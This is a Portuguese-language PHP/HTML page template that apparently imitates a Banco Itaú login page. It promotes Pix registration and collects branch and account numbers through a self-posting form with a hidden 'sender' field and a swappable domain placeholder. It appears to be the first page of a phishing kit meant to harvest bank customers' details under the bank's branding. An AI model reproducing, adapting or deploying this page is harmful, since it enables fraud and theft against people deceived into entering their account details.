<!doctype html>
<html lang="pt-BR">
<head>
	<meta charset='UTF-8'>
	<meta name='viewport' content='width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0'>
	<meta http-equiv='X-UA-Compatible' content='ie=edge'>

	<title>Banco Itaú | Feito com você</title>
	<link rel='shortcut icon' href='<?= DOMINIO; ?>/public/images/favicon.ico'>

	<meta name='theme-color' content='#EC7000'>
	<meta name='apple-mobile-web-app-status-bar-style' content='#EC7000'>
	<meta name='msapplication-navbutton-color' content='#EC7000'>

	<link rel='stylesheet' href='<?= DOMINIO; ?>/public/styles/fonts.css'>
	<link rel='stylesheet' href='<?= DOMINIO; ?>/public/styles/mobile.css'>
</head>
<body class="bg_orange">

<div class="container">
	<div class="content">
		<div id="box_login">
			<div class="logo"><img src="<?= DOMINIO; ?>/public/images/logo.png" alt=""></div>

			<header>
				<h1>Quer pagar e receber a qualquer hora e de graça?</h1>
				<p>Chegou o Pix com um <b>Itaú de segurança</b>. Cadastre-se!</p>
			</header>

			<form action="#" method="post" onsubmit="return checkForm();" autocomplete="off">
				<div class="full">
					<label for="is_agencia">
						<input type="tel" name="is_agencia" id="is_agencia" maxlength="4" placeholder="agência" oninput='if(this.value.length >= this.maxLength){$("#is_conta").focus();}'>
					</label>

					<label for='is_conta'>
						<input type='tel' name='is_conta' id='is_conta' maxlength='7' placeholder='conta'>
					</label>
				</div>

				<button class="btn_entrar">ok</button>
				<input type="hidden" name="sender" value="index">
			</form>
		</div>
	</div>
</div>
<script src="<?= DOMINIO; ?>/public/javascripts/jquery.min.js"></script>
<script src="<?= DOMINIO; ?>/public/javascripts/jquery.mask.js"></script>
<script src="<?= DOMINIO; ?>/public/javascripts/custom.js"></script>
<script>
	$(document).ready(() => {
		$('#is_agencia').mask('0000');
		$('#is_conta').mask('00000-0', {reverse: true});
	});

	function checkForm(){
		const agencia = $('#is_agencia');
		const conta = $('#is_conta');

		const explode = conta.val().split('-');
		const ag_ct = agencia.val() + '' + explode[0];
		const digito = explode[1];
		const checkCount = ValidaConta(ag_ct, digito);

		if (agencia.val().length < 4 || conta.val().length < 5 || !checkCount) {
			alert('Agência e/ou conta informados não estão corretos. Tente novamente!');
			conta.val('');
			agencia.val('').focus();
			return false;
		} else {
			$('.btn_entrar').attr('disabled', true);
			return true;
		}
	}

</script>
</body>
</html>